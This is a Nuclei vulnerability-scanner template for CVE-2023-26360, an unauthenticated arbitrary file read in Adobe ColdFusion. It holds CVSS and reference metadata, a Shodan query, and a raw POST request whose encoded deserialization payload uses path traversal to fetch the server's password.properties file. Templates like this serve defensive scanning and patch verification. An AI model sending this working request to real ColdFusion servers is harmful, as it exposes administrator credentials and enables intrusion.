57 lines
2.1 KiB
YAML
57 lines
2.1 KiB
YAML
id: CVE-2023-26360
|
|
|
|
info:
|
|
name: Unauthenticated File Read Adobe ColdFusion
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier
|
|
remediation: |
|
|
Apply the necessary security patches or updates provided by Adobe to fix the vulnerability.
|
|
reference:
|
|
- https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-26360
|
|
- https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html
|
|
- http://packetstormsecurity.com/files/172079/Adobe-ColdFusion-Unauthenticated-Remote-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cve-id: CVE-2023-26360
|
|
cwe-id: CWE-284
|
|
epss-score: 0.91394
|
|
epss-percentile: 0.98601
|
|
cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: "adobe"
|
|
product: coldfusion
|
|
shodan-query: http.component:"Adobe ColdFusion"
|
|
tags: packetstorm,cve,cve2023,adobe,coldfusion,lfi,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "password="
|
|
- "encrypted=true"
|
|
- "adobe"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
# digest: 490a0046304402202529371dacdb74a3f07b3612122b2e171fe0e76f37585937370515636ea3dfe3022057dff6f5204258fd52610d453ff1645d4576f3f829e04b7b9f501cd878e4e03f:922c64590222798bb761d5b6d8e72950
|